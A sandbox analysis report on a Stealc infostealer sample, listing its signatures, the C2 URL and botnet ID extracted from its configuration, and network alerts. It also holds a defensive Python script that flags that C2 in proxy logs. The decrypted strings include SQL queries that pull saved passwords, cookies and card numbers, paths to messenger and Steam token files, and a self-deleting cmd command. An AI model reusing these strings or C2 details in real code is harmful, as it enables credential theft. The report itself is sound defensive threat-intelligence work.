Windows Analysis Report
6X4BIzTTBR.exe

Overview

General Information

Sample name: 6X4BIzTTBR.exe (renamed because the original name is a hash value)
Original sample name: 5a45cfe0b266362b482cace7205c2c32.exe
Analysis ID: 1563391
MD5: 5a45cfe0b266362b482cace7205c2c32
SHA1: 29bdfb28ebeba5b07571898bf514e9f624606293
SHA256: a0e267be6b982f374175ffc83be37b3fcf351cbd1e9ee899d02fb7c722c55c7b
Tags: exe, Stealc, user-abuse_ch

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

(classification diagram not reproduced)

Process Tree

  • System is w10x64
  • 6X4BIzTTBR.exe (PID: 7356 cmdline: "C:\Users\user\Desktop\6X4BIzTTBR.exe" MD5: 5A45CFE0B266362B482CACE7205C2C32)
    • ED60.tmp.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Local\Temp\ED60.tmp.exe" MD5: A969307FDB2862755469583A5D9BEA48)
      • WerFault.exe (PID: 7896 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7532 -s 1288 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Malware family (threat intelligence):

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration (extracted):
{"C2 url": "http://92.255.57.88/7bbacc20a3bd2eb5.php", "Botnet": "551488411"}
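The extracted configuration gives a defender two network indicators to act on: the C2 URL (host 92.255.57.88, path /7bbacc20a3bd2eb5.php) and, from the signature list, the fact that the sample's HTTP GET and POST requests carry no User-Agent header. The Python below is an added example written for this page; it is not part of the Joe Sandbox report and not Stealc code. It scans proxy log lines in a simplified, assumed format (timestamp, client IP, method, URL, quoted user agent) and tags each request that matches the C2 URL, shares its host, or has no User-Agent. The log lines are constructed, including the GET for /7550b1c08332241a/sqlite3.dll, which reuses a path from the decrypted strings but is not a connection the report records.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Indicator taken from the report's extracted Stealc configuration.
STEALC_C2_URL = "http://92.255.57.88/7bbacc20a3bd2eb5.php"

# Constructed proxy log in an assumed format (not a real log, not the sandbox pcap):
#   <timestamp> <client-ip> <method> <url> ua="<user-agent, empty if the header was absent>"
SAMPLE_LOG = """\
2024-11-26T22:47:10 192.168.2.4 GET https://www.example.org/ ua="Mozilla/5.0 (Windows NT 10.0)"
2024-11-26T22:47:29 192.168.2.4 POST http://92.255.57.88/7bbacc20a3bd2eb5.php ua=""
2024-11-26T22:47:31 192.168.2.4 GET http://92.255.57.88/7550b1c08332241a/sqlite3.dll ua=""
2024-11-26T22:47:40 192.168.2.9 POST https://intranet.example/api/upload ua="curl/8.4.0"
2024-11-26T22:47:41 192.168.2.9 POST https://intranet.example/api/upload ua=""
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) ua="([^"]*)"$')


@dataclass(frozen=True)
class Request:
    line_no: int
    timestamp: str
    client: str
    method: str
    url: str
    user_agent: str


@dataclass(frozen=True)
class Finding:
    line_no: int
    client: str
    url: str
    tags: frozenset


def parse_line(line_no: int, line: str):
    """Parse one log line; return None for lines that do not match the assumed format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return Request(line_no, *m.groups())


def classify(req: Request, c2_url: str) -> frozenset:
    """Tag a request against the C2 indicator and the missing-User-Agent behaviour."""
    tags = set()
    want, got = urlsplit(c2_url), urlsplit(req.url)
    # Compare scheme, host and path only: a different port or an added query string
    # still reaches the same C2 handler, so it must not defeat the match.
    if (got.scheme, got.hostname, got.path) == (want.scheme, want.hostname, want.path):
        tags.add("stealc_c2")
    if got.hostname == want.hostname:
        tags.add("c2_host")
    # The report flags GET/POST without a user agent; on its own this is low confidence.
    if req.method in ("GET", "POST") and req.user_agent == "":
        tags.add("no_user_agent")
    return frozenset(tags)


def scan_log(log_text: str, c2_url: str = STEALC_C2_URL):
    """Return one Finding per request that carries at least one tag, in log order."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        req = parse_line(n, line)
        if req is None:
            continue
        tags = classify(req, c2_url)
        if tags:
            findings.append(Finding(n, req.client, req.url, tags))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.client} -> {f.url}  [{', '.join(sorted(f.tags))}]")
```

The C2 URL match is the high-confidence signal and any other request to that host deserves the same treatment, since the DLLs the family fetches come over plain HTTP from its infrastructure. A missing User-Agent by itself is only a weak hint (some legitimate tooling omits the header too), which is why the script reports it as a tag rather than a verdict; correlate it with the Suricata alert on the same destination before escalating.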
Yara Overview

PCAP (Network Traffic):
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Memory Dumps:
Source | Rule | Description | Author | Strings
00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.4091760416.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1150:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.2250272597.0000000002D6C000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1410:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000003.1957434387.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
(additional entries not shown)

Unpacked PEs:
Source | Rule | Description | Author | Strings
1.3.ED60.tmp.exe.2cb0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
1.2.ED60.tmp.exe.2c70e67.1.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
1.2.ED60.tmp.exe.2c70e67.1.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
1.3.ED60.tmp.exe.2cb0000.0.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
1.2.ED60.tmp.exe.400000.0.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
(additional entries not shown)
                  No Sigma rule has matched
Suricata IDS Alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-26T22:47:29.434017+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 92.255.57.88 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-26T22:47:10.220831+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49730 | 172.67.179.207 | 443 | TCP
2024-11-26T22:47:11.804571+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 176.113.115.37 | 80 | TCP

                  AV Detection

Source: http://92.255.57.88/7bbacc20a3bd2eb5.phpM | Avira URL Cloud: Label: malware
Source: http://92.255.57.88 | Avira URL Cloud: Label: malware
Source: http://92.255.57.88/7bbacc20a3bd2eb5.phpK | Avira URL Cloud: Label: malware
Source: http://92.255.57.88/7bbacc20a3bd2eb5.phpf | Avira URL Cloud: Label: malware
Source: http://92.255.57.88/_ | Avira URL Cloud: Label: malware
Source: http://92.255.57.88/7bbacc20a3bd2eb5.phpb | Avira URL Cloud: Label: malware
Source: http://92.255.57.88/System32 | Avira URL Cloud: Label: malware
Source: http://92.255.57.88/t | Avira URL Cloud: Label: malware
Source: http://92.255.57.88/7bbacc20a3bd2eb5.php | Avira URL Cloud: Label: malware
Source: http://92.255.57.88/ | Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEH | Avira URL Cloud: Label: malware
Source: 00000001.00000003.1957434387.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://92.255.57.88/7bbacc20a3bd2eb5.php", "Botnet": "551488411"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe | ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | ReversingLabs: Detection: 34%
Source: 6X4BIzTTBR.exe | ReversingLabs: Detection: 34%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Joe Sandbox ML: detected
Source: 6X4BIzTTBR.exe | Joe Sandbox ML: detected
Source: 1.2.ED60.tmp.exe.400000.0.unpack | String decryptor (decrypted strings, one per line):
  INSERT_KEY_HERE
  26
  12
  20
  24
  GetProcAddress
  LoadLibraryA
  lstrcatA
  OpenEventA
  CreateEventA
  CloseHandle
  Sleep
  GetUserDefaultLangID
  VirtualAllocExNuma
  VirtualFree
  GetSystemInfo
  VirtualAlloc
  HeapAlloc
  GetComputerNameA
  lstrcpyA
  GetProcessHeap
  GetCurrentProcess
  lstrlenA
  ExitProcess
  GlobalMemoryStatusEx
  GetSystemTime
  SystemTimeToFileTime
  advapi32.dll
  gdi32.dll
  user32.dll
  crypt32.dll
  GetUserNameA
  CreateDCA
  GetDeviceCaps
  ReleaseDC
  CryptStringToBinaryA
  sscanf
  VMwareVMware
  HAL9TH
  JohnDoe
  DISPLAY
  %hu/%hu/%hu
  http://92.255.57.88
  /7bbacc20a3bd2eb5.php
  /7550b1c08332241a/
  551488411
  GetEnvironmentVariableA
  GetFileAttributesA
  HeapFree
  GetFileSize
  GlobalSize
  CreateToolhelp32Snapshot
  IsWow64Process
  Process32Next
  GetLocalTime
  FreeLibrary
  GetTimeZoneInformation
  GetSystemPowerStatus
  GetVolumeInformationA
  GetWindowsDirectoryA
  Process32First
  GetLocaleInfoA
  GetUserDefaultLocaleName
  GetModuleFileNameA
  DeleteFileA
  FindNextFileA
  LocalFree
  FindClose
  SetEnvironmentVariableA
  LocalAlloc
  GetFileSizeEx
  ReadFile
  SetFilePointer
  WriteFile
  CreateFileA
  FindFirstFileA
  CopyFileA
  VirtualProtect
  GetLogicalProcessorInformationEx
  GetLastError
  lstrcpynA
  MultiByteToWideChar
  GlobalFree
  WideCharToMultiByte
  GlobalAlloc
  OpenProcess
  TerminateProcess
  GetCurrentProcessId
  gdiplus.dll
  ole32.dll
  bcrypt.dll
  wininet.dll
  shlwapi.dll
  shell32.dll
  rstrtmgr.dll
  CreateCompatibleBitmap
  SelectObject
  BitBlt
  DeleteObject
  CreateCompatibleDC
  GdipGetImageEncodersSize
  GdipGetImageEncoders
  GdipCreateBitmapFromHBITMAP
  GdiplusStartup
  GdiplusShutdown
  GdipSaveImageToStream
  GdipDisposeImage
  GdipFree
  GetHGlobalFromStream
  CreateStreamOnHGlobal
  CoUninitialize
  CoInitialize
  CoCreateInstance
  BCryptGenerateSymmetricKey
  BCryptCloseAlgorithmProvider
  BCryptDecrypt
  BCryptSetProperty
  BCryptDestroyKey
  BCryptOpenAlgorithmProvider
  GetWindowRect
  GetDesktopWindow
  GetDC
  CloseWindow
  wsprintfA
  EnumDisplayDevicesA
  GetKeyboardLayoutList
  CharToOemW
  wsprintfW
  RegQueryValueExA
  RegEnumKeyExA
  RegOpenKeyExA
  RegCloseKey
  RegEnumValueA
  CryptBinaryToStringA
  CryptUnprotectData
  SHGetFolderPathA
  ShellExecuteExA
  InternetOpenUrlA
  InternetConnectA
  InternetCloseHandle
  HttpSendRequestA
  HttpOpenRequestA
  InternetReadFile
  InternetCrackUrlA
  StrCmpCA
  StrStrA
  StrCmpCW
  PathMatchSpecA
  GetModuleFileNameExA
  RmStartSession
  RmRegisterResources
  RmGetList
  RmEndSession
  sqlite3_open
  sqlite3_prepare_v2
  sqlite3_step
  sqlite3_column_text
  sqlite3_finalize
  sqlite3_close
  sqlite3_column_bytes
  sqlite3_column_blob
  encrypted_key
  PATH
  C:\ProgramData\nss3.dll
  NSS_Init
  NSS_Shutdown
  PK11_GetInternalKeySlot
  PK11_FreeSlot
  PK11_Authenticate
  PK11SDR_Decrypt
  C:\ProgramData\
  SELECT origin_url, username_value, password_value FROM logins
  browser:
  profile:
  url:
  login:
  password:
  Opera
  OperaGX
  Network
  cookies
  .txt
  SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
  TRUE
  FALSE
  autofill
  history
  SELECT url FROM urls LIMIT 1000
  cc
  SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
  name:
  month:
  year:
  card:
  Cookies
  Login Data
  Web Data
  History
  logins.json
  formSubmitURL
  usernameField
  encryptedUsername
  encryptedPassword
  guid
  SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
  SELECT fieldname, value FROM moz_formhistory
  SELECT url FROM moz_places LIMIT 1000
  cookies.sqlite
  formhistory.sqlite
  places.sqlite
  plugins
  Local Extension Settings
  Sync Extension Settings
  IndexedDB
  Opera Stable
  Opera GX Stable
  CURRENT
  chrome-extension_
  _0.indexeddb.leveldb
  Local State
  profiles.ini
  chrome
  opera
  firefox
  wallets
  %08lX%04lX%lu
  SOFTWARE\Microsoft\Windows NT\CurrentVersion
  ProductName
  x32
  x64
  %d/%d/%d %d:%d:%d
  HARDWARE\DESCRIPTION\System\CentralProcessor\0
  SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
  DisplayName
  DisplayVersion
  Network Info:
  - IP: IP?
  - Country: ISO?
  System Summary:
  - HWID:
  - OS:
  - Architecture:
  - UserName:
  - Computer Name:
  - Local Time:
  - UTC:
  - Language:
  - Keyboards:
  - Laptop:
  - Running Path:
  - CPU:
  - Threads:
  - Cores:
  - RAM:
  - Display Resolution:
  - GPU:
  User Agents:
  Installed Apps:
  All Users:
  Current User:
  Process List:
  system_info.txt
  freebl3.dll
  mozglue.dll
  msvcp140.dll
  nss3.dll
  softokn3.dll
  vcruntime140.dll
  \Temp\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: .exe
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: runas
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: open
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: /c start
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: %DESKTOP%
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: %APPDATA%
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: %LOCALAPPDATA%
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: %USERPROFILE%
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: %DOCUMENTS%
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: %PROGRAMFILES_86%
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: %RECENT%
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: *.lnk
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: files
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \discord\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \Local Storage\leveldb
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \Telegram Desktop\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: key_datas
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: D877F783D5D3EF8C*
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: map*
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: A7FDF864FBC10B77*
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: A92DAA6EA6F891F2*
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: F8806DD0C461824F*
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Telegram
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Tox
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: *.tox
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: *.ini
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Password
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: 00000001
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: 00000002
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: 00000003
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: 00000004
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \Outlook\accounts.txt
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Pidgin
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \.purple\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: accounts.xml
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: dQw4w9WgXcQ
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: token:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Software\Valve\Steam
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: SteamPath
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \config\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: ssfn*
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: config.vdf
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: DialogConfig.vdf
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: libraryfolders.vdf
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: loginusers.vdf
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \Steam\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: sqlite3.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: done
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: soft
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \Discord\tokens.txt
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: https
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: POST
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: HTTP/1.1
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Content-Disposition: form-data; name="
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: hwid
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: build
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: token
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: file_name
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: file
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: message
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: screenshot.jpg
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_00404C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,1_2_00404C50
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_004242C0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,1_2_004242C0
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_004060D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,1_2_004060D0
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_00407750 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00407750
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_00409B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00409B20
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_00409B80 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,1_2_00409B80
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C74EB7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_02C74EB7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C86F20 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,1_2_02C86F20
